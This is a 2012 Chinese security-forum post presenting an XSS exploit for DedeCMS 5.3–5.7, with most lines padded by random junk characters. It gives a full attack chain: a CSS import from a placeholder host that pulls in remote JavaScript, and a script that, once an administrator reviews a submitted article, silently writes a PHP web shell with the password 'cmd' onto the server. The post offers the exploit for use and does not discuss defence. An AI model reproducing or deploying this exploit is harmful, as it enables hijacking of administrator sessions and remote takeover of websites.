找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1746|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
/ R( [% C, C% I3 F4 E( c- y% ?4 k4 m为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)' l8 F7 T! k0 d% x
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。% u! a( h# k7 N, \; H; M. E+ k
下面说说利用方法。) |9 r: J/ t6 h
条件有2个:
, q6 C8 d! z, y4 ?1.开启注册: S3 I, o3 c+ T' x
2.开启投稿
4 ]/ a* u& B0 M" H注册会员----发表文章
$ o9 z7 m' ?. y3 a( b' z: ]内容填写:
) W% ?" F! V7 W- p- ^9 g& m复制代码4 r; n' ~" ]0 y3 S* f1 z  R8 O
<style>@im\port'\http://xxx.com/xss.css';</style>$ A, X5 S! p0 ]7 U
新建XSS.Css3 p5 d( ^% |( \
复制代码
7 e- m9 t4 X. D( e0 \) R5 w% I4 c.body{
/ Z. ?$ i0 P# x" S# z, Fbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }& V0 Y6 }9 X" ?4 B2 ~
新建xss.js 内容为
; m6 z6 ~! ?( ~7 y, U复制代码2 V; o9 a  e  Z2 @
1.var request = false;" p- u2 `' N/ i
2.if(window.XMLHttpRequest) {- v1 k( r( ?1 k
3.request = new XMLHttpRequest();/ P! p: T0 ~5 q1 u" k8 ^
4.if(request.overrideMimeType) {
7 p6 Y6 Z6 F8 t0 D+ S# g7 A5.request.overrideMimeType('text/xml');
: _3 \( o9 E9 P  O- I6.}: J0 g! i. A; U. G2 n( F* g
7.} else if(window.ActiveXObject) {) O$ v' Y  I9 |' q  ?+ a
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
7 c, N: l$ S9 N* b$ H9.for(var i=0; i<versions.length; i++) {
$ y; ^5 N; |# a10.try {
/ x' ^0 U3 t, q, T11.request = new ActiveXObject(versions);
$ L" E  N" F5 |" N' m1 h( U12.} catch(e) {}
0 u' u7 s) P! A+ J0 j1 \8 P: P( q13.}7 W6 o3 c+ @: K% @) w: A
14.}* b) E  ?: \1 `  W* U* u! W: D% R
15.xmlhttp=request;
# w- _' N' q* Q6 I16.function getFolder( url ){) W% Q' M8 `  k. e  k4 s, V
17. obj = url.split('/')$ i$ W+ g4 x, V7 U2 Q0 t
18. return obj[obj.length-2]; P/ X/ c; ]3 A5 x5 I. h
19.}# u- l' P. B5 Y! t
20.oUrl = top.location.href;9 s1 c6 h( a/ N9 u7 w$ x6 n% Y; i
21.u = getFolder(oUrl);9 q1 j8 {! v( I2 m3 A
22.add_admin();
8 M* i% W  U0 H  {23.function add_admin(){
1 |( H9 M+ E( d8 U" R% g' u24.var url= "/"+u+"/sys_sql_query.php";
2 L( m1 S1 e5 E" g" m+ F+ \# b25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";; p3 A" c' n& N; }" R
26.xmlhttp.open("POST", url, true);7 V. ~; p2 j1 k8 D
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  W5 w2 R9 q: l% w3 c3 G6 b" H* C28.xmlhttp.setRequestHeader("Content-length", params.length);8 Y# {6 }5 O4 _0 B; l. G
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");! I3 n* e* L! C1 @# s8 i# L) g
30.xmlhttp.send(params);4 @5 e& e6 k1 p. {
31.}$ @- |. B" u$ k- |1 A$ q2 F
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表